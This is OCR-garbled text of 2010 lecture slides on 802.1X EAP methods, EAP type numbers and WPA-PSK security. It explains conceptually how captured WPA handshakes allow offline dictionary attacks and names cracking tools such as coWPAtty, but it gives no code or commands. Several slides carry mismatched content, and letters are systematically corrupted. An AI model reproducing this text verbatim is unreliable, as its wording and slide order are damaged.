51 {C} Herbert Haas 2010/02/15
802.1x - EAP-TTLS
Radius-Iike AVPs
between cIient and Server
CIient certificate not
required but user has two
identities:
1. A anonymous identity
such as
"anonymous@exampIe.c
om" and
2. The reaI identity, which
is onIy sent encrypted,
such as
user342@exampIe.com".
Client identity protected
by TLS
Fast session reconnect
(but too sIow for VoIP)
DetaiIed:
PAP, CHAP,
MSCHAP, MSCHAPv2
AVP TLS EAP
Ethernet
or Radius
Other than PEAP, EAP-TTLS supports any authentication method, not only
EAP-methods. ThereIore, there is no inner EAP session but RADIUS-like AVPs
are used to carry the authentication data.
EAP-TTLS oIten uses PAP (also with Linux).
As with PEAP, user identity information is protected.
52
52 {C} Herbert Haas 2010/02/15
802.1x - Other EAP Choices
More than 44 EAP types aIready defined
.
EAP-FAST: Successor of LEAP
See dedicated section
PEAP-EAP-TLS
Another Microsoft soIution simiIar as EAP-TLS
There are other EAP methods which are currently not so important in the 802.11
WLAN world.
EAP-AKA works similar as LEAP. AKA stands Ior Authentication and Key
Agreement. It is also used with HTTP Authentication and GSM. See draft-arkko-
pppext-eap-aka-12.txt Ior details.
EAP-MD5 does not support mutual authentication and is not strong enough, also some
vendors use it with WLAN devices.
EAP-GTC is typically only used as inner EAP-method oI PEAP. In this case it is oIten
called "PEAP-GTC".
EAP-SIM is used by 3GPP applications (GSM and UMTS). SIM stands Ior Subscriber
Identity Module.
EAP-SRP (Secure Remote Password) is a method used by some vendors, mainly
Orinoco.
WPA-Note: EAP-MD5, EAP-GTC, EAP-OTP, and EAP-MSCHAPV2 cannot be used
alone with WPA. They can only be used as inner authentication algorithms with EAP-
PEAP and EAP-TTLS.
MicrosoIt supports another Iorm oI PEAPv0 (which MicrosoIt calls PEAP-EAP-TLS)
that Cisco and other third-party server and client soItware don`t support.
PEAP-EAP-TLS does require a client-side digital certiIicate located on the client`s
hard drive or a more secure smartcard. PEAP-EAP-TLS is very similar in operation to
the original EAP-TLS but provides slightly more protection due to the Iact that
portions oI the client certiIicate that are unencrypted in EAP-TLS are encrypted in
PEAP-EAP-TLS.
Since Iew third-party clients and servers support PEAP-EAP-TLS, users should
probably avoid it unless they only intend to use MicrosoIt desktop clients and servers.
53
53 {C} Herbert Haas 2010/02/15
EAP Types Overview
1-6 Assigned by RFC
1Identity
2Notification
3Nak (response onIy)
4MD5-ChaIIenge
5One-Time Password (OTP)
6Generic Token Card (GTC)
7-8 Not assigned
9 RSA PubIic Key Authentication
10 DSS UniIateraI
11 KEA
12 KEA-VALIDATE
13 EAP-TLS
14 Defender Token (AXENT)
15 RSA Security SecurID EAP
16 Arcot Systems EAP
17 EAP-Cisco WireIess (LEAP)
18 Nokia IP SmartCard authentication
19 SRP-SHA1 Part 1
20 SRP-SHA1 Part 2
21 EAP-TTLS
22 Remote Access Service
23 UMTS Authentication and Key Agreement
24 EAP-3Com WireIess
25 PEAP
26 MS-EAP-Authentication
27 MutuaI Authentication w/Key Exchange (MAKE)
28 CRYPTOCard
29 EAP-MSCHAP-V2
30 DynamID
31 Rob EAP
32 SecurID EAP
33 EAP-TLV
34 SentriNET
35 EAP-Actiontec WireIess
36 Cogent Systems Biometrics
Authentication EAP
37 AirFortress EAP
38 EAP-HTTP Digest
39 SecureSuite EAP
40 DeviceConnect EAP
41 EAP-SPEKE
42 EAP-MOBAC
43 EAP-FAST
44-191 Not assigned; can be assigned by
IANA on the advice of a designated expert
192-253 Reserved; requires standards
action
254 Expanded types
255 ExperimentaI usage
This list is just Ior reIerence.
54
2010/02/15 {C} Herbert Haas
PEAP
55
55 {C} Herbert Haas 2010/02/15
802.1x using PEAP
Created by Cisco and
Microsoft
SimiIar to EAP-TTLS
Open standard
EAP method 25
Since third EAP
message is aIways in
cIear
Latest draft
E. g. DH-based
If certificates are sent by the server
ComputationaIIy Iightweight
Symmetric cryptography is used
Key concept:
AIso TLS-protected inner EAP
authentication
But PACs instead X.509 certificates
TLV EncapsuIation ProtocoI
TLS
EAP- FAST
EAP
Carrier ProtocoI
(EAPoL, RADIUS, Diameter, .)
Inner EAP or other method
EAP Fast has been designed by Cisco and can be considered as the successor oI
LEAP. Other than LEAP, EAP-FAST is a IETF draIt. (See draIt-cam-winget-eap-
Iast-01.txt).
Client support has been available since Q4/2004. The main goals oI the EAP-
FAST design are:
- Strong authentication and session key provision similar like PEAP or EAP-
TTLS
- Simple deployment without the use oI a PKI
- Fast roaming support in order to allow Ior VoIP applications (WDS integration)
- Computationally lightweight by using symmetric cryptography
EAP-FAST uses so-called Protected Access Credentials (PACs) instead oI
certiIicates. The protocol must Iacilitate the use oI a single strong shared secret by
the peer while enabling the servers to minimize the per user and device state it
must cache and manage.
71
71 {C} Herbert Haas 2010/02/15
PACs
First, Protected Access CredentiaIs
(PACs) are generated by the
authentication server and distributed to
the cIients
SimiIar AP settings
EAP-TTLS/MSCHAPv2
PEAPv0/EAP-MSCHAPv2
PEAPv1/EAP-GTC
EAP-SIM
Native OS support
Nonces
The alternative to server-based keys (SBKs). In WPA-PSK, users must share a
passphrase that may be Irom eight to 63 ASCII characters or 64 hexadecimal digits
(256 bits). Each character in the pass-phrase must have an encoding in the range oI
32 to 126 (decimal), inclusive. (IEEE Std. 802.11i-2004, Annex H.4.1). The space
character is included in this range.
In November 2003, Robert Moskowitz, a senior technical director at ICSA Labs
(part oI TruSecure) released "Weakness in Passphrase Choice in WPA Interface".
In this paper, Moskowitz described a straightIorward Iormula that would reveal the
passphrase by perIorming a dictionary attack against WPA-PSK networks. This
weakness is based on the Iact that the pairwise master key (PMK) is derived Irom the
combination oI the passphrase, SSID, length oI the SSID and nonces. The
concatenated string oI this inIormation is hashed 4,096 times to generate a 256-bit
value and combine with nonce values. The inIormation required to create and veriIy
the session key is broadcast with normal traIIic and is readily obtainable; the
challenge then becomes the reconstruction oI the original values. Moskowitz
explains that the pairwise transient key (PTK) is a keyed-HMAC Iunction based on
the PMK; by capturing the Iour-way authentication handshake, the attacker has the
data required to subject the passphrase to a dictionary attack.
93
93 {C} Herbert Haas 2010/02/15
WPA-PSK (2)
2003: Robert Moskowitz pubIished
an effective dictionary attack against
WPA-PSK
Passphrase shouId be more than 20
characters !!!
Attack TooIs: CoWPAtty, KisMAC,
WPA Cracker, .
According to Moskowitz, "a key generated Irom a passphrase oI less than about
20 characters is unlikely to deter attacks." In late 2004, Takehiro Takahashi, then
a student at Georgia Tech, released WPA Cracker.
Around the same time, Josh Wright, a network engineer and well-known security
lecturer, released coWPAtty. Both tools are written Ior Linux systems and
perIorm a brute-Iorce dictionary attack against WPA-PSK networks in an attempt
to determine the shared passphrase. Both require the user to supply a dictionary
Iile and a dump Iile that contains the WPA-PSK Iour-way handshake. Both
Iunction similarly; however, coWPAtty contains an automatic parser while WPA
Cracker requires the user to perIorm a manual string extraction.
Additionally, coWPAtty has optimized the HMAC-SHA1 Iunction and is
somewhat Iaster. Each tool uses the PBKDF2 (Password-Based Key Derivation
Function) algorithm that governs PSK hashing to attack and determine the
passphrase. Neither is extremely Iast or eIIective against larger passphrases,
though, as each must perIorm 4,096 HMAC-SHA1 iterations with the values as
described in the Moskowitz paper.
PBKDF2 is a key derivation Iunction that is part oI RSA Laboratories' Public-
Key Cryptography Standards (PKCS) series, speciIically PKCS #5 v2.0, also
published as Internet Engineering Task Force's RFC 2898. It replaces an earlier
standard, PBKDF1, which could only produce derived keys up to 160 bits long.